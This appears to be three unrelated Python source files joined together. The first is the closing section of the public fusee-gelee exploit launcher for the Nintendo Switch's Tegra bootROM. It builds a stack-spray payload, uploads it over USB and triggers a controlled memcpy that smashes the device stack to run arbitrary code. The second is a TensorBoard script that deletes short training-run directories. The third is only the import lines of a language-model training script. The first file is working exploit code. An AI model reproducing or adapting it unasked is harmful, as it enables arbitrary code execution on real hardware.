# Fit the section of the payload that comes before the stack spray...
padding_size = STACK_SPRAY_START - PAYLOAD_START_ADDR
payload += target_payload[:padding_size]
# ... insert the stack spray...
repeat_count = int((STACK_SPRAY_END - STACK_SPRAY_START) / 4)
payload += (RCM_PAYLOAD_ADDR.to_bytes(4, byteorder='little') * repeat_count)
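# (Why the spray works, per the public fusee-gelee write-up: it blankets the
# region of the bootROM stack that holds the saved return address, so wherever
# the overflow lands, execution returns to RCM_PAYLOAD_ADDR, where the
# relocated payload lives.)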
# ... and follow the stack spray with the remainder of the payload.
payload += target_payload[padding_size:]
# Pad the payload to fill a USB request exactly, so we don't send a short
# packet and break out of the RCM loop.
payload_length = len(payload)
padding_size = 0x1000 - (payload_length % 0x1000)
payload += (b'\0' * padding_size)
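# (Worked example: a 0x1234-byte payload gets 0x1000 - 0x234 = 0xdcc bytes of
# padding. A payload that is already a multiple of 0x1000 bytes gains one
# extra full block of zeroes, which is harmless here.)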
# Check to see if our payload packet will fit inside the RCM high buffer.
# If it won't, error out.
if len(payload) > length:
    size_over = len(payload) - length
    print("ERROR: Payload is too large to be submitted via RCM. ({} bytes larger than max).".format(size_over))
    sys.exit(errno.EFBIG)
# Send the constructed payload, which contains the command, the stack smashing
# values, the Intermezzo relocation stub, and the final payload.
print("Uploading payload...")
switch.write(payload)
# The RCM backend alternates between two different DMA buffers. Ensure we're
# about to DMA into the higher one, so we have less to copy during our attack.
switch.switch_to_highbuf()
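# (Implementation note, as in the public fusee-launcher source: if the next
# DMA target is still the low buffer, a dummy 0x1000-byte write is issued to
# toggle the backend over to the high one.)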
# Smash the device's stack, triggering the vulnerability.
print("Smashing the stack...")
try:
    switch.trigger_controlled_memcpy()
except ValueError as e:
    print(str(e))
except IOError:
    print("The USB device stopped responding-- sure smells like we've smashed its stack. :)")
    print("Launch complete!")
# <FILESEP>
from argparse import ArgumentParser
import shutil
from tensorboard.backend.event_processing.event_file_inspector import get_inspection_units, get_dict_to_print
"""
Delete every TensorBoard run directory whose run is shorter than a given
number of steps (a run's length is the largest step logged in any field).
"""
parser = ArgumentParser(description='delete small runs')
parser.add_argument('--logdir', type=str, default='.')
parser.add_argument('--delete_smaller_than', type=int)
args = parser.parse_args()
run_len = {}
inspect_units = get_inspection_units(logdir=args.logdir)
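# Each inspection unit is an InspectionUnit namedtuple whose first field is
# the run's directory path; field_to_obs maps event fields to their observed
# statistics, and get_dict_to_print() condenses those into printable dicts
# that include a 'max_step' entry, used below as the run's length.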
for run in inspect_units:
    path = run[0]
    max_length = 0
    for key, value in get_dict_to_print(run.field_to_obs).items():
        if value is not None:
            length = value['max_step']
            if max_length < length:
                max_length = length
    run_len[path] = max_length
for run, length in run_len.items():
    if args.delete_smaller_than is None:
        print(f'run:{run} length:{length}')
    elif length < args.delete_smaller_than:
        try:
            # Delete first, and only report success once rmtree has finished.
            shutil.rmtree(run)
            print(f'{run} is {length} and was deleted')
        except OSError:
            print(f"OS didn't let us delete {run}")
# <FILESEP>
import json
import os
import random
import yaml
import argparse
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM
from transformers import BloomConfig, BloomForCausalLM
from transformers import LlamaForCausalLM, LlamaTokenizer, LlamaConfig
import torch
import deepspeed
from datasets import *
parser = argparse.ArgumentParser()